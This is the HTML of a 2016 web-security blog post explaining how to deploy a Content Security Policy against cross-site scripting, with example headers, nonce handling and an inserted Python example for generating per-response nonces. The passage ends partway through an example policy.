Prajal Kulkarni | Web Security. A blog on Web and Network Security. Post by Prajal Kulkarni, published 2016-05-08: Implementing Content Security Policy. The Fortress of Cross Site Scripting #CSP #XSS<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="margin-bottom: 6pt; margin-top: 10pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="line-height: 1.38;">Content Security Policy is turning out to be one of the solutions at "scale" for fixing cross site scripting. In this blog I have tried condensing data from </span><span style="color: #cc0000; line-height: 1.38;">multiple sources from the internet</span><span style="line-height: 1.38;"> to focus on the important things one need to know to implement CSP for the first time. The idea of this blog post is to help security engineers who want to figure out where to start on CSP if they are in the process of implementing one on their production </span><span style="line-height: 22.08px;">environments</span><span style="line-height: 1.38;">.</span></span></div>
<div style="text-align: left;">
<span style="color: #38761d; font-family: "verdana" , sans-serif; line-height: 1.38; white-space: pre-wrap;">Introducing Content Security Policy:</span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware.</span></span></div>
<div style="text-align: justify;">
<b id="docs-internal-guid-830d0a41-8f83-0043-f8a5-06008cb8f6da" style="font-weight: normal;"><span style="font-family: "verdana" , sans-serif;"><br /></span></b></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The web’s security model is rooted in the </span><a href="http://en.wikipedia.org/wiki/Same_origin_policy" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">same origin policy</span></a><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, code from </span><span style="background-color: transparent; color: #e06666; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">https://mybank.com</span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">should only have access to </span><span style="background-color: transparent; color: #e06666; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">https://mybank.com’s</span><span style="background-color: transparent; color: #e06666; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; 
text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">data, and </span><span style="background-color: transparent; color: #e06666; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">https://evil.example.com</span><span style="background-color: transparent; color: #e06666; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">should certainly never be allowed access. Each origin is kept isolated from the rest of the web, giving developers a safe sandbox in which to build and play. In theory, this is perfectly brilliant. In practice, attackers have found clever ways to subvert the system</span></span></div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><span style="font-family: "verdana" , sans-serif;"><br /></span></b></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">CSP is designed to be fully backward compatible; browsers that don't support it still work with servers that implement it, and vice-versa. Browsers that don't support CSP simply ignore it, functioning as usual, defaulting to the standard same-origin policy for web content. If the site doesn't offer the CSP header, browsers likewise use the standard </span><a href="https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">same-origin policy</span></a></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><a href="http://caniuse.com/#feat=contentsecuritypolicy" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Here</span></a><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> is the list of browsers that support CSP.</span></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="color: #38761d; font-family: "verdana" , sans-serif; line-height: 1.38; white-space: pre-wrap;"><br /></span>
<span style="color: #38761d; font-family: "verdana" , sans-serif; line-height: 1.38; white-space: pre-wrap;">Pre-Requisites:</span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">Before jumping on to the implementation part, It is recommended you go through the W3C CSP recommendations and also few other links I think can be helpful for easy implementation:</span></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<li style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://www.w3.org/TR/CSP2/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">http://www.w3.org/TR/CSP2/</span></span></a></div>
</li>
<li style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://www.cspplayground.com/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">http://www.cspplayground.com/</span></span></a></div>
</li>
<li style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #1155cc; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;"><a href="https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy" style="text-decoration: none;">https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy</a></span></span></div>
</li>
</ul>
<div style="text-align: left;">
<span style="color: #38761d; font-family: "verdana" , sans-serif; line-height: 1.38; text-align: justify; white-space: pre-wrap;"><br /></span></div>
<div style="text-align: left;">
<span style="color: #38761d; font-family: "verdana" , sans-serif; line-height: 1.38; text-align: justify; white-space: pre-wrap;">Pre-production Testing:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<li style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Before implementing CSP on the production server, I recommended to use </span><a href="https://chrome.google.com/webstore/detail/csp-tester/ehmipebdmhlmikaopdfoinmcjhhfadlf?hl=en" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">CSP tester</span></a><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> chrome plugin to test the effects and to identify correct directives to be used as per your need.</span></span></div>
</li>
<li style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">This plugin simulates the behaviour of an actual CSP header sent in the response.</span></span></div>
</li>
</ul>
<div style="text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.6667px; font-style: normal; font-variant: normal; font-weight: 400; margin-left: 1em; margin-right: 1em; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img alt="Screen Shot 2015-10-05 at 4.19.10 pm.png" height="351" src="https://lh3.googleusercontent.com/Rmmv7a_plno2VkGFqiI86GXPKFW8mWhsAPC8lY_d_AOEo-pT81j9xaW2AqAaAl7JG_ANSoIyDUuaRS8vwoZgTEdC66ObXrh9gn7kwR4aRK0XOUBYg0LsHo3onpp1Sbu7DnOqqKb3" style="border: none; transform: rotate(0rad);" width="649" /></span></div>
</div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<li style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">CSP tester plugin + Console Errors are the best way one can debug the error messages which occur by adding CSP header.</span></span></div>
</li>
</ul>
<div style="text-align: justify;">
<b style="font-weight: normal;"><span style="font-family: "verdana" , sans-serif;"><br /></span></b></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "verdana" , sans-serif; margin-left: 1em; margin-right: 1em;"><img alt="Screen Shot 2015-10-05 at 4.19.50 pm.png" height="161" src="https://lh5.googleusercontent.com/sn3Yg3xGzD0VMvVwRlfzSdHdkOHfXv2vOS5f1EIBMLO38rlXMOsRazKBdNZA4U72uMN8Ks24Rw7GuBw-KSPIiq33zqDggzZ_OGzoQHSIJtJch5oRPKF9uJXiHl_XW0o6Z-p7NvLE" style="border: none; transform: rotate(0rad);" width="644" /></span></div>
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;"><span style="color: #38761d; line-height: 1.38;"><br /></span></span></span>
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;"><span style="color: #38761d; line-height: 1.38;">Secure way of Implementing CSP:</span></span></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<li style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">There are multiple ways to implement CSP. Just by whitelisting javascript source files, one does not end up securing the application from XSS. Developers normally implement CSP in a way which makes their work easier leaving the application still vulnerable to XSS. </span></span></div>
</li>
</ul>
<span style="color: #38761d; font-family: "verdana" , sans-serif; line-height: 1.38; white-space: pre-wrap;"></span><br />
<div le="text-align: justify;" sty="">
<span style="color: #38761d; font-family: "verdana" , sans-serif; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">CSP Directives:</span></span></div>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; text-align: justify; width: 624px;"><colgroup><col width="*"></col></colgroup><tbody>
<tr style="height: 40px;"><td style="background-color: #d9d9d9; border-bottom: solid #434343 1px; border-left: solid #434343 1px; border-right: solid #434343 1px; border-top: solid #434343 1px; padding: 7px 7px 7px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #444444; color: #e28964; font-family: "verdana"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Content-Security-Policy: </span><span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">default-src</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #444444; color: #65b042; font-family: "verdana"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'none’</span></div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">The first step to start a CSP header is to specify which is the default source list. A better practise to implement this is to call it ‘none’, which will encourage us to whitelist all the sources we have.</span></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Few sources to be considered </span><span style="background-color: transparent; color: #6aa84f; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[script,style,connect,object,img,child]</span></span></div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; text-align: justify; width: 624px;"><colgroup><col width="*"></col></colgroup><tbody>
<tr style="height: 40px;"><td style="background-color: #d9d9d9; border-bottom: solid #434343 1px; border-left: solid #434343 1px; border-right: solid #434343 1px; border-top: solid #434343 1px; padding: 7px 7px 7px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #444444; color: #e28964; font-family: "verdana"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Content-Security-Policy: </span><span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">script-src</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #444444; color: #65b042; font-family: "verdana"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'self'</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> https://img1a.flixcart.com; https://img1a.flixcart.com</span></div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">W</span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">hitelist all the script origins as shown in above example and make sure we do not add ‘unsafe-inline’ to the script-src directive. If we allow inline javascript to run than it could defeat the purpose of CSP. </span></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">With unsafe-inline we allow inline JS to execute in our application, which means if the application is vulnerable to XSS, an attacker will still be able to execute JS in the context of our application.</span></span><br />
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;"><br /></span></span></div>
<div style="text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="color: #38761d; line-height: 1.38; white-space: pre-wrap;">Handling Inline JS:</span></span></div>
<div style="text-align: left;">
<span style="font-family: "verdana" , sans-serif;">
</span>
</div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If we have inline javascript which requires to execute then we need to specify a random </span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">nonce</span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in the header. We have to generate this nonce at the server end and send it across in the CSP header and consume the same in our inline Javascripts.</span></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">To use a nonce, give your script tag a nonce attribute. Its value must match one in the list of trusted sources. </span></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">Example:</span></span><br />
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;"><br /></span></span></div>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; text-align: justify; width: 624px;"><colgroup><col width="*"></col></colgroup><tbody>
<tr style="height: 40px;"><td style="background-color: #d9d9d9; border-bottom: solid #434343 1px; border-left: solid #434343 1px; border-right: solid #434343 1px; border-top: solid #434343 1px; padding: 7px 7px 7px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #444444; color: #e28964; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Content-Security-Policy: </span><span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">script-src</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #444444; color: #65b042; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'nonce-EDNnf03nceIOfn39fn3e9h3sdfa</span></div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; text-align: justify; width: 624px;"><colgroup><col width="*"></col></colgroup><tbody>
<tr style="height: 40px;"><td style="background-color: #d9d9d9; border-bottom: solid #434343 1px; border-left: solid #434343 1px; border-right: solid #434343 1px; border-top: solid #434343 1px; padding: 7px 7px 7px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><script</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #444444; color: darkkhaki; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">nonce</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">=</span><span style="background-color: #444444; color: #65b042; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">EDNnf03nceIOfn39fn3e9h3sdfa</span><span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">></span><span style="background-color: #444444; color: white; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span><span style="background-color: #444444; color: white; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #444444; color: #aeaeae; font-family: "verdana"; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; 
vertical-align: baseline; white-space: pre-wrap;">//Some inline code I cant remove yet, but need to asap.</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span><span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></script></span></div>
</td></tr>
</tbody></table>
</div>
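The nonce flow described above, as an added example that is not part of the original post: a fresh, unpredictable nonce for every response, the same value in the header and on each script tag, and a scan for inline event handlers and javascript: URLs, which a nonce cannot authorise and which stay blocked without 'unsafe-inline'. The function names and the sample page are constructed for illustration.

```python
"""Nonce-based handling of inline scripts for a CSP without 'unsafe-inline'.
Added example, not code from the original post; render_response and the
sample page are constructed for illustration."""
import re
import secrets
from html import escape
from typing import Dict, List, Optional, Tuple

SCRIPT_OPEN = re.compile(r"<script\b([^>]*)>", re.IGNORECASE)
# A nonce authorises <script> blocks only. Inline event handlers and
# javascript: URLs stay blocked without 'unsafe-inline', so they have to be
# found and moved into a nonced <script> block.
UNCOVERED = re.compile(r"\bon[a-z]+\s*=|javascript:", re.IGNORECASE)
NONCE_IN_HEADER = re.compile(r"'nonce-([A-Za-z0-9_-]+)'")

# Constructed sample template standing in for a server-side page.
SAMPLE_PAGE = """<html><body>
<script src="/static/app.js"></script>
<script>
// Some inline code I can't remove yet, but need to asap.
initPage();
</script>
<button onclick="doThing()">Go</button>
</body></html>"""


def new_nonce() -> str:
    """128 bits from the OS CSPRNG, base64url encoded. Generate one per response;
    a fixed or guessable nonce is as weak as 'unsafe-inline'."""
    return secrets.token_urlsafe(16)


def build_csp(nonce: str) -> str:
    """Policy value following the post: deny by default, first-party scripts
    plus nonced inline blocks, and no 'unsafe-inline'."""
    return (
        "default-src 'none'; "
        f"script-src 'self' 'nonce-{nonce}'; "
        "style-src 'self'; img-src 'self'; connect-src 'self'"
    )


def nonce_scripts(html: str, nonce: str) -> str:
    """Add nonce="..." to every <script> tag that does not already carry one."""
    def add(match):
        attrs = match.group(1)
        if re.search(r"\bnonce\s*=", attrs, re.IGNORECASE):
            return match.group(0)
        return f'<script nonce="{escape(nonce, quote=True)}"{attrs}>'
    return SCRIPT_OPEN.sub(add, html)


def find_uncovered_inline_js(html: str) -> List[str]:
    """Return snippets a nonce cannot authorise (on* handlers, javascript: URLs)."""
    return [m.group(0).strip() for m in UNCOVERED.finditer(html)]


def header_nonce(csp_value: str) -> Optional[str]:
    """Extract the nonce from a policy value, to check header and body agree."""
    match = NONCE_IN_HEADER.search(csp_value)
    return match.group(1) if match else None


def render_response(template: str) -> Tuple[Dict[str, str], str]:
    """Headers and body for one response, with the same fresh nonce in both."""
    nonce = new_nonce()
    headers = {"Content-Security-Policy": build_csp(nonce)}
    return headers, nonce_scripts(template, nonce)


if __name__ == "__main__":
    hdrs, body = render_response(SAMPLE_PAGE)
    print(hdrs["Content-Security-Policy"])
    print(body)
    print("still blocked, needs refactoring:", find_uncovered_inline_js(body))
```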
<div style="text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #38761d; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">Example Policy:</span></span></div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; text-align: justify;"><colgroup><col width="621"></col></colgroup><tbody>
<tr style="height: 40px;"><td style="background-color: #d9d9d9; border-bottom: solid #434343 1px; border-left: solid #434343 1px; border-right: solid #434343 1px; border-top: solid #434343 1px; padding: 7px 7px 7px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #444444; color: #e28964; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Content-Security-Policy: </span></div>
<div dir="ltr" style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">default-src</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #444444; color: #65b042; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'none'</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">; </span><span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">script-src</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #444444; color: #65b042; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'nonce-EDNnf03nceIOfn39fn3e9h3sdfa </span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 
400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">http://img1a.flixcart.com http://img2a.flixcart.com https://www.google-analytics.com https://s3.amazonaws.com;</span></div>
<div dir="ltr" style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt;">
